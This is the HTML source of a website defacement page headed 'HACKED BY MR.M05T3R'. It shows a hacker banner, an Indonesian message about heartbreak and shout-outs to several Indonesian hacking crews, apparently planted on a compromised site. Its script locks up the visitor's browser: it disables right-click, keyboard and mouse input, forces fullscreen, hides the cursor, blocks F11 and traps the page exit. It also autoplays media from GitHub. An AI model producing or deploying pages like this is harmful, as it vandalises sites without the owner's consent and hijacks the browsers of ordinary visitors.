
<html>
    <!-- #NEWBIECYBERSECURITY #CYBERALLIANCE -->
    <head>
        <title>HACKED BY MR.M05T3R</title>
        <meta charset="UTF-8"/>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1"/>
        <link rel="icon" type="image/png" href="https://i.ibb.co/bKV05z7/defaceai.png"/>
        <meta name="title" content="HACKED BY MR.M05T3R">
        <meta name="description" content="#NEWBIECYBERSECURITY #CYBERALLIANCE">
        <meta name="keywords" content="mr.m05t3r, sumoonid, hacked, hacker, deface">
        <meta name="robots" content="index, follow">
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <meta name="language" content="English">
        <meta name="revisit-after" content="60 days">
        <meta name="author" content="MR.M05T3R">
        <meta property="og:image" content="https://i.ibb.co/bKV05z7/defaceai.png">
        <meta name="theme-color" content="#000">
        <style type='text/css'>
            body,a:hover {
                cursor: url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur),progress!important;
            }
        </style>
        <link rel="stylesheet" href="https://i.ibb.co/bKV05z7/defaceai.png">
    </head>
    <body bgcolor="black" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body">
        <style type="text/css">
            center {
                font-family: Courier;
            }

            img {
                opacity: 80%;
            }

            red {
                color: red;
            }

            #background-video {
                height: 100vh;
                width: 100vw;
                object-fit: cover;
                position: fixed;
                left: 0;
                right: 0;
                top: 0;
                bottom: 0;
                z-index: -1;
            }

            font {
                text-shadow: #000 0px 0px 3px;
                -webkit-font-smoothing: antialiased;
            }
            button {
                display: block;
                margin: 10px auto 0;
                padding: 10px 20px;
                background-color: #4CAF50;
                color: #fff;
                border: none;
                border-radius: 5px;
                font-size: 16px;
                cursor: pointer;
            }
        </style>
        <script language="JavaScript">
            window.onbeforeunload = confirmExit;
            function confirmExit() {
                return "are you sure ? wkwk";
            }
            function fs() {
                var elem = document.documentElement;
                if (elem.requestFullscreen) {
                    elem.requestFullscreen();
                } else if (elem.msRequestFullscreen) {
                    elem.msRequestFullscreen();
                } else if (elem.mozRequestFullScreen) {
                    elem.mozRequestFullScreen();
                } else if (elem.webkitRequestFullscreen) {
                    elem.webkitRequestFullscreen();
                }
                document.getElementById("body").style.cursor = 'none';
                document.onkeydown = function(e) {
                    return false;
                }
                document.addEventListener("keydown", e=>{
                    if (e.key == "F11")
                        e.preventDefault();
                }
                );
            }
        </script>
        <audio src="https://github.com/defacemoster/audio/raw/main/sadboys" autoplay="true" id="lagu"></audio>
        <video id="background-video" src="https://github.com/anonseven/heker/raw/main/videoplayback.mp4" autoplay="" loop="" muted="" poster="data:image/png;base64, iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=">
            <source src="https://github.com/anonseven/heker/raw/main/videoplayback.mp4" type="video/mp4">
        </video>
        <table width="100%" height="80%">
            <td>
                <center>
                    <small>#NEWBIECYBERSECURITY #CYBERALLIANCE</small>
                    <br>
                    <img src="https://i.ibb.co/hfRvZ3x/defaceaiw.png" width="220" height="220" loading="lazy" onerror="this.style.display = 'none'">
                    <br>
                    HACKED BY 
                    <red>
                        <i>MR.M05T3R</i>
                    </red>
                    <br>
                    <font size="2">
                        "Ingat Nona Cowo Yang Tulus Dan Sangat Sayang Kepada Mu Walaupun Kamu Menyakitinya Dia Tidak Akan Membalas Perbuatan Mu Itu, Melainkan Dia Akan Menyakiti Diri Nya Sendiri, Jadi Tolong Buat Kalian Para Wanita Jangan Mengkhianati Atau Menyakiti Pasangan Kalian Yang Sayang Nya Melebihi Dirinya Sendiri, Karena Kalian Tidak Tau Betapa Sakit Dan Hancurnya Jika Dia Disakiti Atau Dikhianati."<br>
                    </font>
                    <br>
                    <br>
                    <small>
                        <button class="button">PLAY</button>
                    </small>
                    <div class="footer-greetings">
                        <marquee>
                            <font size="2">
                                <b>#SUPPORT:</b>
                             NEWBIE CYBER SECURITY - CYBER ALLIANCE - CYBER LATION - GEDOR WEBSITE - NOVGREY - CODEBLUES INDONESIA - JABAR ERROR SYSTEM - SURABAYAXPLOIT - DORAEMON CYBER TEAM - SABUNMANDI CYBER TEAM - JAVA CYBER ARMY
        
                            </font>
                        </marquee>
                    </div>
            </td>
          </table>
